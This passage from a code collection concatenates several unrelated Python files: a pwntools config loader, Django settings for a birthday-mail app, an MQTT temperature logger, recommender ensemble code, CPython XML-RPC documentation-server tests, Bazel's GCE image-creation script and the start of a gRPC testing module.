return function(*a, **kw)
return setter
# Read configuration options from the context section
def update_context_defaults(section):
# Circular imports FTW!
from pwnlib.util import safeeval
from pwnlib.log import getLogger
log = getLogger(__name__)
for key, value in section.items():
if key not in ContextType.defaults:
log.warn("Unknown configuration option %r in section %r" % (key, 'context'))
continue
default = ContextType.defaults[key]
if isinstance(default, six.string_types + six.integer_types + (tuple, list, dict)):
value = safeeval.expr(value)
else:
log.warn("Unsupported configuration option %r in section %r" % (key, 'context'))
        # Attempt to set the value, to see if it is valid:
try:
with context.local(**{key: value}):
value = getattr(context, key)
except (ValueError, AttributeError) as e:
log.warn("Could not set context.%s=%s via pwn.conf (%s)", key, section[key], e)
continue
ContextType.defaults[key] = value
register_config('context', update_context_defaults)
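# Hedged example: update_context_defaults() above is registered for the
# "context" section of the pwntools configuration file, so a user-level file
# (e.g. ~/.pwn.conf) can override defaults. The exact values below are
# illustrative only:
#
#   [context]
#   terminal = ['tmux', 'splitw', '-h']
#   noptrace = True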
|
settings_20210906113250.py
|
"""
Django settings for First_Wish project.
Generated by 'django-admin startproject' using Django 3.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
import os
import environ
import threading
import schedule
import time
from First_Wish_Main_App.views import decrease_day_count_and_send_bday_mails
env_path = os.path.join(os.path.dirname(__file__), '../.env')
environ.Env.read_env(env_path)
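# Hedged illustration: the .env file loaded above is expected to define the
# values read via os.environ below, e.g. (hypothetical value):
#
#   DJANGO_SECRET_KEY=replace-me-with-a-real-secret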
# ///////////////////////////////SCHEDULE THE decrease_day_count_and_send_bday_mails ////////////////////
# Schedule the task to run once every day (time set below)
schedule.every().day.at("11:32").do(decrease_day_count_and_send_bday_mails)
# schedule.every().day.at("01:00").do(delete_task_and_add_store_datewise)
# def func():
# while True:
# print("======Runnning==========")
# schedule.run_pending()
# time.sleep(1)
# t1 = threading.Thread(target=func)
# t1.start()
schedule.run_pending()
# ///////////////////////////////SCHEDULE THE ENABLE BUTTON ENDS////////////////////
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
templates_path=os.path.join(BASE_DIR,'templates')
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY =os.environ.get('DJANGO_SECRET_KEY')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'First_Wish_Main_App',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'First_Wish.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [templates_path],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'First_Wish.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Kolkata'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
STATICFILES_DIRS = [
os.path.join(BASE_DIR, "static"),
]
|
logger.py
|
import time
import re
import socket
import sys
import traceback
import paho.mqtt.client as mqtt
from threading import Thread
class TemperatureLogger:
config = None
mqtt_client = None
mqtt_connected = False
worker = None
# removed as not one of my requirements
#temperatures = {}
def __init__(self, config):
self.config = config
self.wait_update = self.config.get('wait_update', float(60))
self.wait_process = self.config.get('wait_process', float(5))
def verbose(self, message):
if self.config and 'verbose' in self.config and self.config['verbose'] == 'true':
sys.stdout.write('VERBOSE: ' + message + '\n')
sys.stdout.flush()
def error(self, message):
sys.stderr.write('ERROR: ' + message + '\n')
sys.stderr.flush()
def mqtt_connect(self):
if self.mqtt_broker_reachable():
self.verbose('Connecting to ' + self.config['mqtt_host'] + ':' + self.config['mqtt_port'])
self.mqtt_client = mqtt.Client(self.config['mqtt_client_id'])
if 'mqtt_user' in self.config and 'mqtt_password' in self.config:
self.mqtt_client.username_pw_set(self.config['mqtt_user'], self.config['mqtt_password'])
self.mqtt_client.on_connect = self.mqtt_on_connect
self.mqtt_client.on_disconnect = self.mqtt_on_disconnect
try:
self.mqtt_client.connect(self.config['mqtt_host'], int(self.config['mqtt_port']), 60)
self.mqtt_client.loop_forever()
except:
self.error(traceback.format_exc())
self.mqtt_client = None
else:
self.error(self.config['mqtt_host'] + ':' + self.config['mqtt_port'] + ' not reachable!')
def mqtt_on_connect(self, mqtt_client, userdata, flags, rc):
self.mqtt_connected = True
self.verbose('...mqtt_connected!')
def mqtt_on_disconnect(self, mqtt_client, userdata, rc):
self.mqtt_connected = False
        self.verbose('Disconnected! Will reconnect! ...')
        if rc == 0:
self.mqtt_connect()
else:
time.sleep(5)
while not self.mqtt_broker_reachable():
time.sleep(10)
self.mqtt_client.reconnect()
def mqtt_broker_reachable(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
try:
s.connect((self.config['mqtt_host'], int(self.config['mqtt_port'])))
s.close()
return True
except socket.error:
return False
def update(self):
while True:
for source in self.config['sources']:
serial = source['serial']
topic = source['topic']
# added ijm
dev = source['device']
device = open('/sys/bus/w1/devices/' + serial + '/w1_slave')
raw = device.read()
device.close()
match = re.search(r't=([\d]+)', raw)
if match:
temperature_raw = match.group(1)
temperature = round(float(temperature_raw)/1000, 2)
if 'offset' in source:
temperature += float(source['offset'])
self.publish_temperature(topic, temperature, dev)
                    '''
                    # this block meant that only temperature changes were published; my requirement
                    # is to publish regardless. Many may want this, so I will look at making it an option.
                    if serial not in self.temperatures or self.temperatures[serial] != temperature:
                        self.temperatures[serial] = temperature
                        self.publish_temperature(topic, temperature, dev)'''
self.verbose('Entering wait_process delay of: ' + str(self.wait_process) + ' Seconds')
time.sleep(self.wait_process)
self.verbose('Entering wait_update delay of: ' + str(self.wait_update) + ' Seconds')
time.sleep(self.wait_update)
def publish_temperature(self, topic, temperature, dev):
if self.mqtt_connected:
dev = '{{ "{0}": {1} }}'.format(dev, str(temperature))
self.verbose('Publishing: ' + str(temperature))
self.mqtt_client.publish(topic, dev, 0, True)
def start(self):
self.worker = Thread(target=self.update)
self.worker.setDaemon(True)
self.worker.start()
self.mqtt_connect()
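

# Hedged usage sketch (not part of the original module): TemperatureLogger
# expects a config dict with MQTT connection details and a list of 1-Wire
# sources. Every value below is a hypothetical placeholder; running this needs
# a reachable MQTT broker and the w1 sysfs entries on the host.
if __name__ == '__main__':
    example_config = {
        'verbose': 'true',
        'mqtt_host': 'localhost',
        'mqtt_port': '1883',              # kept as a string, as the class expects
        'mqtt_client_id': 'temperature-logger',
        'wait_update': 60.0,
        'wait_process': 5.0,
        'sources': [
            {'serial': '28-000000000000',  # hypothetical DS18B20 serial
             'topic': 'home/livingroom/temperature',
             'device': 'livingroom'},
        ],
    }
    TemperatureLogger(example_config).start()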
|
ensembles_base.py
|
import warnings
from abc import abstractmethod, ABC
from functools import partial
from itertools import repeat
from multiprocessing import Process, Queue
from multiprocessing.pool import ThreadPool, Pool
from queue import PriorityQueue
from threading import Thread
import numpy as np
import pandas as pd
import scipy.stats
from ml_recsys_tools.recommenders.recommender_base import BaseDFSparseRecommender
from ml_recsys_tools.utils.parallelism import N_CPUS
RANK_COMBINATION_FUNCS = {
'mean': np.mean,
'max': np.max,
'min': np.min,
'gmean': scipy.stats.gmean,
'hmean': scipy.stats.hmean
}
def calc_dfs_and_combine_scores(calc_funcs, groupby_col, item_col, scores_col,
fill_val, combine_func='hmean', n_threads=1,
parallelism='process'):
"""
combine multiple dataframes by voting on prediction rank
:param calc_funcs: functions that return the dataframes to be combined
    :param combine_func: defaults to 'hmean'; the function that is used to combine the predictions
        (can be a callable like np.mean, or a string that is assumed to be
        a key in the RANK_COMBINATION_FUNCS mapping)
:param fill_val: rank to be assigned to NaN prediction values
(items appearing in some dataframes but not in others)
:param groupby_col: the column of the entities for which the ranking is calculated (e.g. users)
:param item_col: the column of the entities to be ranked (items)
:param scores_col: the column of the scores to be ranked (predictions)
:param n_threads: number of calculation threads
:param parallelism: type of parallelism (processes or threads)
:return: a combined dataframe of the same format as the dataframes created by the calc_funcs
"""
# set up
multiproc = 'process' in parallelism
_END = 'END'
q_in = Queue()
q_out = Queue() if multiproc else PriorityQueue()
rank_cols = ['rank_' + str(i) for i in range(len(calc_funcs))]
n_jobs = len(calc_funcs)
n_workers = min(n_threads, n_jobs)
if not callable(combine_func):
combine_func = RANK_COMBINATION_FUNCS[combine_func]
jitter = lambda: np.random.rand()
def _calc_df_and_add_rank_score(i):
df = calc_funcs[i]()
df = df.drop_duplicates()
# another pandas bug workaround
df[groupby_col] = df[groupby_col].astype(str, copy=False)
df[item_col] = df[item_col].astype(str, copy=False)
df[scores_col] = df[scores_col].astype(float, copy=False)
df = df.reset_index(drop=True) # resetting index due to pandas bug
df[rank_cols[i]] = df. \
groupby(groupby_col)[scores_col].\
rank(ascending=False)
df = df.drop(scores_col, axis=1).set_index([groupby_col, item_col])
q_out.put((len(df) + jitter(), df))
def _joiner():
while True:
_, df1 = q_out.get()
if isinstance(df1, str) and df1 == _END:
break
_, df2 = q_out.get()
if isinstance(df2, str) and df2 == _END:
q_out.put((len(df1) + jitter(), df1)) # put it back
break
df_joined = df2.join(df1, how='outer')
q_out.put((len(df_joined) + jitter(), df_joined))
def _worker():
i = q_in.get()
while i != _END:
_calc_df_and_add_rank_score(i)
i = q_in.get()
if multiproc:
workers = [Process(target=_worker) for _ in range(n_workers)]
else:
workers = [Thread(target=_worker) for _ in range(n_workers)]
joiner = Thread(target=_joiner)
# submit and start jobs
[q_in.put(i) for i in range(n_jobs)] + [q_in.put(_END) for _ in range(n_workers)]
[j.start() for j in workers + [joiner]]
[j.join() for j in workers]
# stop joiner after workers are done by putting END token
q_out.put((0, _END))
joiner.join()
# final reduce (faster to join in couples rather one by one)
while q_out.qsize() > 1:
_, df1 = q_out.get()
_, df2 = q_out.get()
df_joined = df2.join(df1, how='outer')
q_out.put((len(df_joined), df_joined))
# get final result
_, merged_df = q_out.get()
merged_df.fillna(fill_val, inplace=True)
# combine ranks
merged_df[scores_col] = combine_func(1 / merged_df[rank_cols].values, axis=1)
# drop temp cols
merged_df.drop(rank_cols, axis=1, inplace=True)
return merged_df.reset_index()
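

# Hedged usage sketch: combining two toy prediction frames with the function
# above by averaging their per-user ranks. The column names and data are made
# up for illustration; fill_val assigns that rank to items missing from one of
# the frames.
def _example_rank_combination():
    df_a = pd.DataFrame({'user': ['u1', 'u1'], 'item': ['i1', 'i2'], 'score': [0.9, 0.1]})
    df_b = pd.DataFrame({'user': ['u1', 'u1'], 'item': ['i1', 'i3'], 'score': [0.2, 0.8]})
    return calc_dfs_and_combine_scores(
        calc_funcs=[lambda: df_a, lambda: df_b],
        groupby_col='user', item_col='item', scores_col='score',
        fill_val=3, combine_func='mean', n_threads=2, parallelism='thread')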
class EnsembleBase(BaseDFSparseRecommender):
def __init__(self,
combination_mode='hmean',
na_rank_fill=None,
**kwargs):
self.combination_mode = combination_mode
self.na_rank_fill = na_rank_fill
self.recommenders = []
super().__init__(**kwargs)
def n_concurrent(self):
return N_CPUS
def set_params(self, **params):
params = self._pop_set_params(params, ['combination_mode', 'na_rank_fill'])
# set on self
super().set_params(**params.copy())
def _get_recommendations_flat(self, user_ids, item_ids, n_rec=100, **kwargs):
calc_funcs = [
partial(
rec.get_recommendations,
user_ids=user_ids, item_ids=item_ids,
n_rec=n_rec, results_format='flat', **kwargs)
for rec in self.recommenders]
recos_flat = calc_dfs_and_combine_scores(
calc_funcs=calc_funcs,
combine_func=self.combination_mode,
fill_val=self.na_rank_fill if self.na_rank_fill else (n_rec + 1),
groupby_col=self._user_col,
item_col=self._item_col,
scores_col=self._prediction_col,
n_threads=self.n_concurrent()
)
return recos_flat
def get_similar_items(self, item_ids=None, target_item_ids=None, n_simil=10,
n_unfilt=100, results_format='lists', **kwargs):
calc_funcs = [partial(rec.get_similar_items,
item_ids=item_ids, target_item_ids=target_item_ids,
n_simil=n_unfilt, results_format='flat', **kwargs)
for rec in self.recommenders]
combined_simil_df = calc_dfs_and_combine_scores(
calc_funcs=calc_funcs,
combine_func=self.combination_mode,
fill_val=self.na_rank_fill if self.na_rank_fill else (n_unfilt + 1),
groupby_col=self._item_col_simil,
item_col=self._item_col,
scores_col=self._prediction_col)
return combined_simil_df if results_format == 'flat' \
else self._simil_flat_to_lists(combined_simil_df, n_cutoff=n_simil)
def _predict_on_inds_dense(self, user_inds, item_inds):
raise NotImplementedError()
def predict_for_user(self, user_id, item_ids, rank_training_last=True,
sort=True, combine_original_order=False):
calc_funcs = [
partial(
rec.predict_for_user,
user_id=user_id,
item_ids=item_ids,
rank_training_last=rank_training_last,
combine_original_order=combine_original_order,
)
for rec in self.recommenders]
df = calc_dfs_and_combine_scores(
calc_funcs=calc_funcs,
combine_func=self.combination_mode,
fill_val=len(item_ids),
groupby_col=self._user_col,
item_col=self._item_col,
scores_col=self._prediction_col,
n_threads=N_CPUS,
parallelism='thread'
)
if sort:
df.sort_values(self._prediction_col, ascending=False, inplace=True)
return df
class SubdivisionEnsembleBase(EnsembleBase):
def __init__(self,
n_recommenders=1,
concurrence_ratio=0.3,
concurrency_backend='threads',
**kwargs):
self.n_recommenders = n_recommenders
self.concurrence_ratio = concurrence_ratio
self.concurrency_backend = concurrency_backend
super().__init__(**kwargs)
self.sub_class_type = None
self._init_recommenders()
def get_workers_pool(self, concurrency_backend=None):
if concurrency_backend is None:
concurrency_backend = self.concurrency_backend
if 'thread' in concurrency_backend:
return ThreadPool(self.n_concurrent())
elif 'proc' in concurrency_backend:
return Pool(self.n_concurrent(), maxtasksperchild=3)
def _init_recommenders(self, **params):
self.recommenders = [self.sub_class_type(**params.copy())
for _ in range(self.n_recommenders)]
def n_concurrent(self):
return int(min(np.ceil(len(self.recommenders) * self.concurrence_ratio), N_CPUS))
def set_params(self, **params):
params = self._pop_set_params(
params, ['n_recommenders', 'concurrence_ratio'])
# set on self
super().set_params(**params.copy())
# init sub models to make sure they're the right object already
self._init_recommenders(**self.model_params)
# # set for each sub_model
# for model in self.recommenders:
# # model.set_params(**params.copy())
# model.set_params()
@abstractmethod
def _generate_sub_model_train_data(self, train_obs):
pass
@abstractmethod
def _fit_sub_model(self, args):
pass
def fit(self, train_obs, **fit_params):
self._set_data(train_obs)
sub_model_train_data_generator = self._generate_sub_model_train_data(train_obs)
n_recommenders = self.n_recommenders
with self.get_workers_pool() as pool:
self.recommenders = list(
pool.imap(self._fit_sub_model,
zip(range(n_recommenders),
sub_model_train_data_generator,
repeat(fit_params, n_recommenders))))
return self
# def sub_model_evaluations(self, test_dfs, test_names, include_train=True):
# stats = []
# reports = []
# for m in self.recommenders:
# users = m.train_df[self.train_obs.uid_col].unique()
# items = m.train_df[self.train_obs.iid_col].unique()
# sub_test_dfs = [df[df[self.train_obs.uid_col].isin(users) &
# df[self.train_obs.iid_col].isin(items)] for df in test_dfs]
# lfm_report = m.eval_on_test_by_ranking(
# include_train=include_train,
# test_dfs=sub_test_dfs,
# prefix='lfm sub model',
# test_names=test_names
# )
# stats.append('train: %d, test: %s' %
# (len(m.train_df), [len(df) for df in sub_test_dfs]))
# reports.append(lfm_report)
# return stats, reports
class CombinationEnsembleBase(EnsembleBase):
def __init__(self, recommenders, **kwargs):
super().__init__(**kwargs)
self.recommenders = recommenders
self._reuse_data(self.recommenders[0])
def fit(self, *args, **kwargs):
warnings.warn('Fit is not supported, recommenders should already be fitted.')
|
test_docxmlrpc.py
|
from xmlrpc.server import DocXMLRPCServer
import http.client
import sys
from test import support
threading = support.import_module('threading')
import time
import socket
import unittest
PORT = None
def make_request_and_skipIf(condition, reason):
# If we skip the test, we have to make a request because
# the server created in setUp blocks expecting one to come in.
if not condition:
return lambda func: func
def decorator(func):
def make_request_and_skip(self):
self.client.request("GET", "/")
self.client.getresponse()
raise unittest.SkipTest(reason)
return make_request_and_skip
return decorator
def server(evt, numrequests):
serv = DocXMLRPCServer(("localhost", 0), logRequests=False)
try:
global PORT
PORT = serv.socket.getsockname()[1]
# Add some documentation
serv.set_server_title("DocXMLRPCServer Test Documentation")
serv.set_server_name("DocXMLRPCServer Test Docs")
serv.set_server_documentation(
"This is an XML-RPC server's documentation, but the server "
"can be used by POSTing to /RPC2. Try self.add, too.")
# Create and register classes and functions
class TestClass(object):
def test_method(self, arg):
"""Test method's docs. This method truly does very little."""
self.arg = arg
serv.register_introspection_functions()
serv.register_instance(TestClass())
def add(x, y):
"""Add two instances together. This follows PEP008, but has nothing
to do with RFC1952. Case should matter: pEp008 and rFC1952. Things
that start with http and ftp should be auto-linked, too:
http://google.com.
"""
return x + y
def annotation(x: int):
""" Use function annotations. """
return x
class ClassWithAnnotation:
def method_annotation(self, x: bytes):
return x.decode()
serv.register_function(add)
serv.register_function(lambda x, y: x-y)
serv.register_function(annotation)
serv.register_instance(ClassWithAnnotation())
while numrequests > 0:
serv.handle_request()
numrequests -= 1
except socket.timeout:
pass
finally:
serv.server_close()
PORT = None
evt.set()
class DocXMLRPCHTTPGETServer(unittest.TestCase):
def setUp(self):
self._threads = support.threading_setup()
# Enable server feedback
DocXMLRPCServer._send_traceback_header = True
self.evt = threading.Event()
threading.Thread(target=server, args=(self.evt, 1)).start()
# wait for port to be assigned
deadline = time.monotonic() + 10.0
while PORT is None:
time.sleep(0.010)
if time.monotonic() > deadline:
break
self.client = http.client.HTTPConnection("localhost:%d" % PORT)
def tearDown(self):
self.client.close()
self.evt.wait()
# Disable server feedback
DocXMLRPCServer._send_traceback_header = False
support.threading_cleanup(*self._threads)
def test_valid_get_response(self):
self.client.request("GET", "/")
response = self.client.getresponse()
self.assertEqual(response.status, 200)
self.assertEqual(response.getheader("Content-type"), "text/html")
# Server raises an exception if we don't start to read the data
response.read()
def test_invalid_get_response(self):
self.client.request("GET", "/spam")
response = self.client.getresponse()
self.assertEqual(response.status, 404)
self.assertEqual(response.getheader("Content-type"), "text/plain")
response.read()
def test_lambda(self):
"""Test that lambda functionality stays the same. The output produced
        currently is, I suspect, invalid because of the unencoded brackets in the
HTML, "<lambda>".
The subtraction lambda method is tested.
"""
self.client.request("GET", "/")
response = self.client.getresponse()
self.assertIn((b'<dl><dt><a name="-<lambda>"><strong>'
b'<lambda></strong></a>(x, y)</dt></dl>'),
response.read())
@make_request_and_skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_autolinking(self):
"""Test that the server correctly automatically wraps references to
PEPS and RFCs with links, and that it linkifies text starting with
http or ftp protocol prefixes.
The documentation for the "add" method contains the test material.
"""
self.client.request("GET", "/")
response = self.client.getresponse().read()
self.assertIn(
(b'<dl><dt><a name="-add"><strong>add</strong></a>(x, y)</dt><dd>'
b'<tt>Add two instances together. This '
b'follows <a href="http://www.python.org/dev/peps/pep-0008/">'
b'PEP008</a>, but has nothing<br>\nto do '
b'with <a href="http://www.rfc-editor.org/rfc/rfc1952.txt">'
b'RFC1952</a>. Case should matter: pEp008 '
b'and rFC1952. Things<br>\nthat start '
b'with http and ftp should be '
b'auto-linked, too:<br>\n<a href="http://google.com">'
b'http://google.com</a>.</tt></dd></dl>'), response)
@make_request_and_skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_system_methods(self):
"""Test the precense of three consecutive system.* methods.
This also tests their use of parameter type recognition and the
systems related to that process.
"""
self.client.request("GET", "/")
response = self.client.getresponse().read()
self.assertIn(
(b'<dl><dt><a name="-system.methodHelp"><strong>system.methodHelp'
b'</strong></a>(method_name)</dt><dd><tt><a href="#-system.method'
b'Help">system.methodHelp</a>(\'add\') => "Adds '
b'two integers together"<br>\n <br>\nReturns a'
b' string containing documentation for '
b'the specified method.</tt></dd></dl>\n<dl><dt><a name'
b'="-system.methodSignature"><strong>system.methodSignature</strong>'
b'</a>(method_name)</dt><dd><tt><a href="#-system.methodSignature">'
b'system.methodSignature</a>(\'add\') => [double, '
b'int, int]<br>\n <br>\nReturns a list '
b'describing the signature of the method.'
b' In the<br>\nabove example, the add '
b'method takes two integers as arguments'
b'<br>\nand returns a double result.<br>\n '
b'<br>\nThis server does NOT support system'
b'.methodSignature.</tt></dd></dl>'), response)
def test_autolink_dotted_methods(self):
"""Test that selfdot values are made strong automatically in the
documentation."""
self.client.request("GET", "/")
response = self.client.getresponse()
self.assertIn(b"""Try self.<strong>add</strong>, too.""",
response.read())
def test_annotations(self):
""" Test that annotations works as expected """
self.client.request("GET", "/")
response = self.client.getresponse()
docstring = (b'' if sys.flags.optimize >= 2 else
b'<dd><tt>Use function annotations.</tt></dd>')
self.assertIn(
(b'<dl><dt><a name="-annotation"><strong>annotation</strong></a>'
b'(x: int)</dt>' + docstring + b'</dl>\n'
b'<dl><dt><a name="-method_annotation"><strong>'
b'method_annotation</strong></a>(x: bytes)</dt></dl>'),
response.read())
def test_main():
support.run_unittest(DocXMLRPCHTTPGETServer)
if __name__ == '__main__':
test_main()
|
create_images.py
|
#!/usr/bin/env python3
#
# Copyright 2018 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from datetime import datetime
import json
import os
import queue
import subprocess
import sys
import tempfile
import threading
import gcloud
import gcloud_utils
DEBUG = False
IMAGE_CREATION_VMS = {
"bk-testing-docker": {
"project": "bazel-public",
"zone": "us-central1-f",
"source_image_project": "ubuntu-os-cloud",
"source_image_family": "ubuntu-2004-lts",
"setup_script": "setup-docker.sh",
"guest_os_features": ["VIRTIO_SCSI_MULTIQUEUE"],
"licenses": [
"https://www.googleapis.com/compute/v1/projects/vm-options/global/licenses/enable-vmx"
],
},
"bk-testing-windows": {
"project": "bazel-public",
"zone": "us-central1-f",
"source_image_project": "windows-cloud",
"source_image_family": "windows-20h2-core",
"setup_script": "setup-windows.ps1",
"guest_os_features": ["VIRTIO_SCSI_MULTIQUEUE"],
},
"windows-playground": {
"project": "di-cloud-exp",
"zone": "us-central1-f",
"network": "default",
"source_image_project": "windows-cloud",
"source_image_family": "windows-2019",
"setup_script": "setup-windows.ps1",
"guest_os_features": ["VIRTIO_SCSI_MULTIQUEUE"],
},
}
WORK_QUEUE = queue.Queue()
def run(args, **kwargs):
return subprocess.run(args, **kwargs)
def preprocess_setup_script(setup_script, is_windows):
output_file = tempfile.mkstemp()[1]
newline = "\r\n" if is_windows else "\n"
with open(output_file, "w", newline=newline) as f:
with open(setup_script, "r") as setup_script_file:
if is_windows:
f.write("$setup_script = @'\n")
f.write(setup_script_file.read() + "\n")
if is_windows:
f.write("'@\n")
f.write('[System.IO.File]::WriteAllLines("c:\\setup.ps1", $setup_script)\n')
return output_file
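# Illustrative sketch (not part of the original script): for Windows hosts the function
# above wraps the setup script in a PowerShell here-string so that booting the VM only
# writes the real script to disk for the operator to run later over RDP. A script
# containing just "echo hello" would be rewritten to roughly:
#
#   $setup_script = @'
#   echo hello
#   '@
#   [System.IO.File]::WriteAllLines("c:\setup.ps1", $setup_script)
#
# For Linux images the script content is passed through unchanged.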
def create_instance(instance_name, params):
is_windows = "windows" in instance_name
setup_script = preprocess_setup_script(params["setup_script"], is_windows)
try:
if is_windows:
startup_script = "windows-startup-script-ps1=" + setup_script
else:
startup_script = "startup-script=" + setup_script
if "source_image" in params:
image = {"image": params["source_image"]}
else:
image = {
"image-project": params["source_image_project"],
"image-family": params["source_image_family"],
}
gcloud.create_instance(
instance_name,
project=params["project"],
zone=params["zone"],
machine_type="c2-standard-8",
network=params.get("network", "default"),
metadata_from_file=startup_script,
boot_disk_type="pd-ssd",
boot_disk_size=params.get("boot_disk_size", "500GB"),
**image,
)
finally:
os.remove(setup_script)
# https://stackoverflow.com/a/25802742
def write_to_clipboard(output):
process = subprocess.Popen("pbcopy", env={"LANG": "en_US.UTF-8"}, stdin=subprocess.PIPE)
process.communicate(output.encode("utf-8"))
def print_windows_instructions(project, zone, instance_name):
tail_start = gcloud_utils.tail_serial_console(
instance_name, project=project, zone=zone, until="Finished running startup scripts"
)
pw = json.loads(
gcloud.reset_windows_password(
instance_name, format="json", project=project, zone=zone
).stdout
)
rdp_file = tempfile.mkstemp(suffix=".rdp")[1]
with open(rdp_file, "w") as f:
f.write("full address:s:" + pw["ip_address"] + "\n")
f.write("username:s:" + pw["username"] + "\n")
subprocess.run(["open", rdp_file])
write_to_clipboard(pw["password"])
with gcloud.PRINT_LOCK:
print("Use this password to connect to the Windows VM: " + pw["password"])
print("Please run the setup script C:\\setup.ps1 once you're logged in.")
# Wait until the VM reboots once, then open RDP again.
tail_start = gcloud_utils.tail_serial_console(
instance_name,
project=project,
zone=zone,
start=tail_start,
until="GCEGuestAgent: GCE Agent Started",
)
print("Connecting via RDP a second time to finish the setup...")
write_to_clipboard(pw["password"])
run(["open", rdp_file])
return tail_start
def workflow(name, params):
instance_name = "%s-image-%s" % (name, int(datetime.now().timestamp()))
project = params["project"]
zone = params["zone"]
try:
# Create the VM.
create_instance(instance_name, params)
# Wait for the VM to become ready.
gcloud_utils.wait_for_instance(instance_name, project=project, zone=zone, status="RUNNING")
if "windows" in instance_name:
# Wait for VM to be ready, then print setup instructions.
tail_start = print_windows_instructions(project, zone, instance_name)
# Continue printing the serial console until the VM shuts down.
gcloud_utils.tail_serial_console(
instance_name, project=project, zone=zone, start=tail_start
)
else:
# Continuously print the serial console.
gcloud_utils.tail_serial_console(instance_name, project=project, zone=zone)
# Wait for the VM to completely shutdown.
gcloud_utils.wait_for_instance(
instance_name, project=project, zone=zone, status="TERMINATED"
)
# Create a new image from our VM.
gcloud.create_image(
instance_name,
project=project,
family=name,
source_disk=instance_name,
source_disk_zone=zone,
licenses=params.get("licenses", []),
guest_os_features=params.get("guest_os_features", []),
)
finally:
gcloud.delete_instance(instance_name, project=project, zone=zone)
def worker():
while True:
item = WORK_QUEUE.get()
if not item:
break
try:
workflow(**item)
finally:
WORK_QUEUE.task_done()
def main(argv=None):
if argv is None:
argv = sys.argv[1:]
if not argv:
print("Usage: create_images.py {}".format(" ".join(IMAGE_CREATION_VMS.keys())))
return 1
unknown_args = set(argv).difference(IMAGE_CREATION_VMS.keys())
if unknown_args:
print(
"Unknown platforms: {}\nAvailable platforms: {}".format(
", ".join(unknown_args), ", ".join(IMAGE_CREATION_VMS.keys())
)
)
return 1
# Put VM creation instructions into the work queue.
for name in argv:
WORK_QUEUE.put({"name": name, "params": IMAGE_CREATION_VMS[name]})
# Spawn worker threads that will create the VMs.
threads = []
for _ in range(WORK_QUEUE.qsize()):
t = threading.Thread(target=worker)
t.start()
threads.append(t)
# Wait for all VMs to be created.
WORK_QUEUE.join()
# Signal worker threads to exit.
for _ in range(len(threads)):
WORK_QUEUE.put(None)
# Wait for worker threads to exit.
for t in threads:
t.join()
return 0
if __name__ == "__main__":
sys.exit(main())
|
_invocation.py
|
# Copyright 2017 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import threading
import grpc
_NOT_YET_OBSERVED = object()
logging.basicConfig()
_LOGGER = logging.getLogger(__name__)
def _cancel(handler):
return handler.cancel(grpc.StatusCode.CANCELLED, 'Locally cancelled!')
def _is_active(handler):
return handler.is_active()
def _time_remaining(unused_handler):
raise NotImplementedError()
def _add_callback(handler, callback):
return handler.add_callback(callback)
def _initial_metadata(handler):
return handler.initial_metadata()
def _trailing_metadata(handler):
trailing_metadata, unused_code, unused_details = handler.termination()
return trailing_metadata
def _code(handler):
unused_trailing_metadata, code, unused_details = handler.termination()
